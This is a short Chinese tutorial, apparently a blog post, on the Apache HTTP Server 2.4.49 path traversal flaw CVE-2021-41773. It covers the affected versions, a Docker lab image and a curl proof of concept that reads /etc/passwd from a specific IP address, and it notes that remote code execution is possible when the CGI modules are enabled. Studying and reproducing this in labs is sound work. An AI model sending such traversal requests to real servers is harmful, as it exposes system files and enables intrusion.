常见中间件漏洞之四:Apache

1. CVE-2021-41773

Apache HTTP Server 路径穿越漏洞

漏洞简介

该漏洞是由于Apache HTTP Server 2.4.49版本存在⽬录穿越漏洞,在路径穿越⽬录<Directory/>Require all granted</Directory>允许被访问的的情况下(默认开启),攻击者可利⽤该路径穿越漏洞读取到Web⽬录之外的其他⽂件

在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执⾏任意cgi命令(RCE)

影响版本

Apache HTTP Server 2.4.49

某些Apache HTTPd 2.4.50也存在此漏洞

环境搭建

docker pull blueteamsteve/cve-2021-41773:no-cgid

漏洞复现

http://8.138.19.182:8082/

1.使⽤poc

curl http://8.138.19.182:8082/cgi-bin/../../../../etc/passwd

2.⼯具验证

3.在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执⾏任意cg命令

相关推荐
野熊佩骑15 小时前
一文读懂Redis之数据持久化
linux·运维·数据库·redis·缓存·中间件·centos
2501_9181269117 小时前
apache 服务器如何使用
运维·服务器·apache
武子康21 小时前
AI-调查研究-90-具身智能 机器人数据采集与通信中间件全面解析:ROS/ROS2、LCM 与工业总线对比
人工智能·ai·中间件·机器人·职场发展·个人开发·具身智能
十五年专注C++开发1 天前
通信中间件 Fast DDS(三) :fastddsgen的安装与使用
linux·c++·windows·中间件·跨平台
梦想养猫开书店2 天前
38、spark读取hudi报错:java.io.NotSerializableException: org.apache.hadoop.fs.Path
java·spark·apache
问道飞鱼2 天前
【分布式中间件】RabbitMQ 功能详解与高可靠实现指南
分布式·中间件·rabbitmq·amqp
boonya2 天前
Apache Doris 大数据仓库全面解析
数据仓库·apache
鸠摩智首席音效师2 天前
如何在 Apache 中启用 HSTS 以增强网络安全性 ?
网络·apache
boonya3 天前
Apache Doris 入门与技术替代方案
apache·doris